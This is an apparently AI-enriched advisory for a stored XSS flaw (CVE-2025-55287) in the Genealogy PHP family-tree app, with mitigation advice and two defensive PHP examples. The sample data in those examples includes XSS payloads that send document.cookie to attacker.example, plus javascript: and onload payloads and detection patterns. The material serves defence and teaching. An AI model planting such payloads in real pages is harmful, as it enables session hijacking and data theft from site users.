
CVE-2025-55287: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in MGeurts genealogy

Severity: High
Tags: Vulnerability, CVE-2025-55287, CWE-79
Published: Mon Aug 18 2025 (08/18/2025, 16:54:17 UTC)
Source: CVE Database V5
Vendor/Project: MGeurts
Product: genealogy

Description

Genealogy is a family tree PHP application. Prior to 4.4.0, an authenticated stored Cross-Site Scripting (XSS) vulnerability was identified in the Genealogy application. Authenticated attackers could run arbitrary JavaScript in another user's session, leading to session hijacking, data theft, and UI manipulation. This vulnerability is fixed in 4.4.0.

AI-Powered Analysis

Last updated: 08/18/2025, 17:18:11 UTC

Technical Analysis

CVE-2025-55287 is a high-severity authenticated stored cross-site scripting (XSS) vulnerability in the MGeurts genealogy PHP application, affecting versions prior to 4.4.0. The root cause is improper neutralization of user-supplied input during web page generation (CWE-79): content entered by an authenticated user is stored persistently by the application and later written back into HTML without adequate output encoding, so script or event-handler markup in that content executes in the browser of any other user who views the affected page. The injected script runs with the victim's session, which is what enables session hijacking, theft of any data the victim can see, and manipulation of the UI. The record does not name the affected input field. Exploitation requires an account on the application (the attacker must be able to store content) and user interaction in the CVSS sense, i.e. a victim loading the page that renders the payload; no link needs to be clicked, because a stored payload fires on every view until the content is removed. The CVSS 3.0 base score of 8.0 reflects high impact on confidentiality, integrity, and availability with low attack complexity and no privileges beyond an ordinary authenticated account. The flaw is fixed in version 4.4.0. No exploitation in the wild has been reported, but the vulnerability poses a significant risk to organizations running vulnerable versions of the MGeurts genealogy software.
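To make the CWE-79 mechanism concrete, here is an added example in plain PHP. It is not code from the Genealogy project, and since the record does not identify the affected field, the "notes" field, the sample payload and the other stored values are hypothetical, constructed for the demo. It renders the same stored values through a vulnerable path and a hardened path and reports whether live markup survives:

```php
<?php
// Added example (not the Genealogy project's code): a stored-XSS round trip
// in plain PHP, with the vulnerable and the hardened rendering side by side.
// The "notes" field and the sample payload are hypothetical.
declare(strict_types=1);

// Constructed sample values as an authenticated user could save them into a
// free-text field. The application stores them verbatim; the bug is in how
// they are written back into HTML.
$storedNotes = [
    'Born in Leiden, 1902.',
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    'Moved to "De Pijp" <3 & loved it',
];

// Vulnerable rendering (CWE-79): the stored text is concatenated straight into
// the page, so any tag or event handler it contains runs in the viewer's browser.
function renderVulnerable(string $notes): string
{
    return '<p class="notes">' . $notes . '</p>';
}

// Hardened rendering: encode on output. ENT_QUOTES turns both quote styles into
// entities, ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty
// string, and the explicit charset avoids encoding mismatches.
function renderSafe(string $notes): string
{
    return '<p class="notes">'
        . htmlspecialchars($notes, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8')
        . '</p>';
}

// Demo oracle, not a production detector: does the rendered body still contain
// a tag opener (a '<' followed by a letter, '!', '/' or '?')? A '<' followed by
// anything else, such as "<3", is plain text to an HTML parser.
function containsMarkup(string $html): bool
{
    $body = substr($html, strlen('<p class="notes">'), -strlen('</p>'));
    return preg_match('~<[a-z!/?]~i', $body) === 1;
}

foreach ($storedNotes as $notes) {
    $vuln = renderVulnerable($notes);
    $safe = renderSafe($notes);
    printf("input: %s\n", $notes);
    printf("  vulnerable: %s  [markup: %s]\n", $vuln, containsMarkup($vuln) ? 'yes' : 'no');
    printf("  hardened:   %s  [markup: %s]\n\n", $safe, containsMarkup($safe) ? 'yes' : 'no');
}
```

In a templating engine with auto-escaping the same distinction is which output syntax is used: Blade's {{ }} behaves like renderSafe and {!! !!} like renderVulnerable; Twig escapes by default and |raw disables it. Encoding belongs at output rather than at input because one stored value may be rendered in several contexts, and an attribute or JavaScript context needs its own encoder rather than htmlspecialchars alone.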

Potential Impact

For European organizations running the MGeurts genealogy application, in particular genealogy research groups, family history services, and cultural heritage institutions, the consequences can be severe. Genealogy records routinely contain personal data about living people, so script running in another user's session can read and exfiltrate information protected under GDPR. Session hijacking lets an attacker act as the victim, reaching whatever that user can view or edit, and UI manipulation (for example, injecting a fake login prompt into an otherwise trusted page) undermines user trust and damages organizational reputation. Where the application is integrated with other systems or shared across many users, the impact can extend beyond the genealogy platform itself. The authentication requirement limits exposure, but any user who can edit content is a potential attacker: a malicious insider, a collaborator on a shared tree, or an account compromised through stolen or reused credentials.

Mitigation Recommendations

Organizations should immediately upgrade the MGeurts genealogy application to version 4.4.0 or later, where the vulnerability is patched. Because the payload is stored, upgrading stops new injection but does not remove content an attacker has already saved: after patching, audit user-editable free-text fields for script tags, event-handler attributes (onerror, onload, and similar) and javascript: URLs, remove anything found, and consider invalidating active sessions. If the upgrade cannot be applied immediately, the only fix inside the application is to HTML-encode user-supplied data at the point of output (in PHP, htmlspecialchars with ENT_QUOTES and an explicit UTF-8 charset, or the auto-escaping output syntax of the templating engine); input validation alone does not close a stored XSS. Deploy a Content Security Policy whose script-src does not allow 'unsafe-inline', so the browser refuses inline scripts and event handlers injected into the page, and mark the session cookie HttpOnly and Secure so injected script cannot read it through document.cookie (it can still issue requests as the user, so this is a mitigation, not a fix). Restrict content-creation rights to trusted accounts, enforce strong authentication, and monitor for anomalous logins, since any account able to edit records can plant a payload. User awareness training is of limited value here: a stored XSS executes when a victim simply views a page, so no untrusted link needs to be clicked. A web application firewall with XSS rules adds defense in depth but is bypassable and should not be relied on in place of the patch.
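The audit and response-header steps above, as an added PHP example that is not the project's own code. The table and column names and the sample rows are hypothetical, constructed to show what the indicators catch and what they leave alone; in practice the rows would come from a query over the application's user-editable columns:

```php
<?php
// Added example (not the Genealogy project's code). Audits stored free-text
// records for script-capable markup and lists the response headers a
// hardening step would send. Table/column names and rows are hypothetical.
declare(strict_types=1);

// Constructed sample rows standing in for user-editable fields pulled from
// the database (e.g. SELECT id, notes FROM people).
$rows = [
    ['id' => 1, 'table' => 'people', 'column' => 'notes',
     'value' => 'Emigrated to Canada in 1911.'],
    ['id' => 2, 'table' => 'people', 'column' => 'notes',
     'value' => '<script>document.location="https://attacker.example/?c="+document.cookie</script>'],
    ['id' => 3, 'table' => 'events', 'column' => 'description',
     'value' => '<a href="javascript:alert(1)">family photo</a>'],
    ['id' => 4, 'table' => 'events', 'column' => 'description',
     'value' => '<svg onload=alert(document.domain)>'],
    ['id' => 5, 'table' => 'people', 'column' => 'notes',
     'value' => 'Height < 6ft & liked "strong" coffee'],
];

// Indicators of script-capable HTML. Deliberately broad: an audit should
// surface candidates for a human to review, not prove exploitability.
const XSS_INDICATORS = [
    'script_tag'    => '~<\s*script\b~i',
    'event_handler' => '~<[a-z][^>]*\s+on[a-z]+\s*=~i',
    'js_url'        => '~<[a-z][^>]*\s(href|src|action|formaction)\s*=\s*["\']?\s*javascript:~i',
    'embedding_tag' => '~<\s*(iframe|object|embed|base)\b~i',
];

// Returns the names of the indicators that match one stored value.
function auditValue(string $value): array
{
    $hits = [];
    foreach (XSS_INDICATORS as $name => $pattern) {
        if (preg_match($pattern, $value) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Returns one finding per row that matched at least one indicator.
function auditRows(array $rows): array
{
    $findings = [];
    foreach ($rows as $row) {
        $hits = auditValue($row['value']);
        if ($hits !== []) {
            $findings[] = [
                'location'   => sprintf('%s.%s#%d', $row['table'], $row['column'], $row['id']),
                'indicators' => $hits,
            ];
        }
    }
    return $findings;
}

// Response headers for defence in depth. script-src without 'unsafe-inline'
// makes the browser refuse injected inline scripts, on* handlers and
// javascript: URLs; a nonce-based policy is the alternative if the
// application needs its own inline scripts.
function hardeningHeaders(): array
{
    return [
        "Content-Security-Policy: default-src 'self'; script-src 'self'; "
            . "object-src 'none'; base-uri 'self'; frame-ancestors 'none'",
        'X-Content-Type-Options: nosniff',
    ];
}

function sendHardeningHeaders(): void
{
    foreach (hardeningHeaders() as $header) {
        header($header);   // must run before any output is sent
    }
}

foreach (auditRows($rows) as $finding) {
    printf("%-22s %s\n", $finding['location'], implode(', ', $finding['indicators']));
}
```

On the constructed rows, ids 2, 3 and 4 are reported (script_tag, js_url and event_handler respectively) while rows 1 and 5 are not, even though row 5 contains a bare < and an &: the patterns key on a tag opener followed by a letter, not on the characters themselves, so ordinary prose is not flagged. Treat every hit as a candidate for manual review and removal rather than as proof of compromise.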


Technical Details

Data Version
5.1
Assigner Short Name
GitHub_M
Date Reserved
2025-08-12T16:15:30.237Z
CVSS Version
3.0
State
PUBLISHED

Threat ID: 68a35cb2ad5a09ad00b0b5e0

Added to database: 8/18/2025, 5:02:42 PM

Last enriched: 8/18/2025, 5:18:11 PM

Last updated: 8/19/2025, 12:34:27 AM


